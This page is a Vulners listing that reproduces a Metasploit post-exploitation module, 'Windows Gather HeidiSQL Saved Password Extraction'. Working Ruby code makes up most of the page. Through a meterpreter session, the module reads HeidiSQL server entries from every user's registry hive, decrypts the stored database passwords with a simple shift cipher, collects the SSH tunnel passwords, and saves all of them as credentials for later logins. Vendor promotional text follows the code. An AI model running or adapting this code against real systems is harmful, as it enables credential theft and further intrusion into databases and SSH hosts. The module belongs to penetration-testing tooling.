Lucene search
K

Windows Gather HeidiSQL Saved Password Extraction

🗓️ 26 Mar 2016 11:00:25Reported by h0ng10Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 246 Views

Windows Gather HeidiSQL Saved Password Extraction. This module extracts and decrypts saved passwords from the HeidiSQL client, stored in the registry with a custom encryption algorithm

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather HeidiSQL Saved Password Extraction',
        'Description' => %q{
          This module extracts saved passwords from the HeidiSQL client. These
          passwords are stored in the registry. They are encrypted with a custom algorithm.
          This module extracts and decrypts these passwords.
        },
        'License' => MSF_LICENSE,
        'Author' => ['h0ng10'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

  def print_error(msg = '')
    super("#{peer} - #{msg}")
  end

  def print_good(msg = '')
    super("#{peer} - #{msg}")
  end

  def run
    userhives = load_missing_hives
    userhives.each do |hive|
      next if hive['HKU'].nil?

      print_status("Looking at Key #{hive['HKU']}")
      begin
        subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers")
        if subkeys.blank?
          print_status('HeidiSQL not installed for this user.')
          next
        end

        service_types = {
          0 => 'mysql',
          1 => 'mysql-named-pipe',
          2 => 'mysql-ssh',
          3 => 'mssql-named-pipe',
          4 => 'mssql',
          5 => 'mssql-spx-ipx',
          6 => 'mssql-banyan-vines',
          7 => 'mssql-windows-rpc',
          8 => 'postgres'
        }

        subkeys.each do |site|
          site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}"
          host = registry_getvaldata(site_key, 'Host') || ''
          user = registry_getvaldata(site_key, 'User') || ''
          port = registry_getvaldata(site_key, 'Port') || ''
          db_type = registry_getvaldata(site_key, 'NetType') || ''
          prompt = registry_getvaldata(site_key, 'LoginPrompt') || ''
          ssh_user = registry_getvaldata(site_key, 'SSHtunnelUser') || ''
          ssh_host = registry_getvaldata(site_key, 'SSHtunnelHost') || ''
          ssh_port = registry_getvaldata(site_key, 'SSHtunnelPort') || ''
          ssh_pass = registry_getvaldata(site_key, 'SSHtunnelPass') || ''
          win_auth = registry_getvaldata(site_key, 'WindowsAuth') || ''
          epass = registry_getvaldata(site_key, 'Password')

          # skip if windows authentication is used (mssql only)
          next if db_type.between?(3, 7) && (win_auth == 1)
          next if epass.nil? || (epass == '') || (epass.length == 1) || (prompt == 1)

          pass = decrypt(epass)
          print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user}  Password: #{pass}")

          service_data = {
            address: host == '127.0.0.1' ? rhost : host,
            port: port,
            service_name: service_types[db_type],
            protocol: 'tcp',
            workspace_id: myworkspace_id
          }

          credential_data = {
            origin_type: :session,
            session_id: session_db_id,
            post_reference_name: refname,
            private_type: :password,
            private_data: pass,
            username: user
          }

          credential_data.merge!(service_data)

          # Create the Metasploit::Credential::Core object
          credential_core = create_credential(credential_data)

          # Assemble the options hash for creating the Metasploit::Credential::Login object
          login_data = {
            core: credential_core,
            status: Metasploit::Model::Login::Status::UNTRIED
          }

          # Merge in the service data and create our Login
          login_data.merge!(service_data)
          login = create_credential_login(login_data)

          # if we have a MySQL via SSH connection, we need to store the SSH credentials as well
          next unless db_type == 2

          print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user}  Password: #{ssh_pass}")

          service_data = {
            address: ssh_host,
            port: ssh_port,
            service_name: 'ssh',
            protocol: 'tcp',
            workspace_id: myworkspace_id
          }

          credential_data = {
            origin_type: :session,
            session_id: session_db_id,
            post_reference_name: refname,
            private_type: :password,
            private_data: ssh_pass,
            username: ssh_user
          }

          credential_data.merge!(service_data)

          # Create the Metasploit::Credential::Core object
          credential_core = create_credential(credential_data)

          # Assemble the options hash for creating the Metasploit::Credential::Login object
          login_data = {
            core: credential_core,
            status: Metasploit::Model::Login::Status::UNTRIED
          }

          # Merge in the service data and create our Login
          login_data.merge!(service_data)
          login = create_credential_login(login_data)
        end
      rescue ::Rex::Post::Meterpreter::RequestError => e
        elog(e)
        print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}")
      end
    end
    unload_our_hives(userhives)
  end

  def decrypt(encoded)
    decoded = ''
    shift = Integer(encoded[-1, 1])
    encoded = encoded[0, encoded.length - 1]

    hex_chars = encoded.scan(/../)
    hex_chars.each do |entry|
      x = entry.to_i(16) - shift
      decoded += x.chr(::Encoding::UTF_8)
    end

    return decoded
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation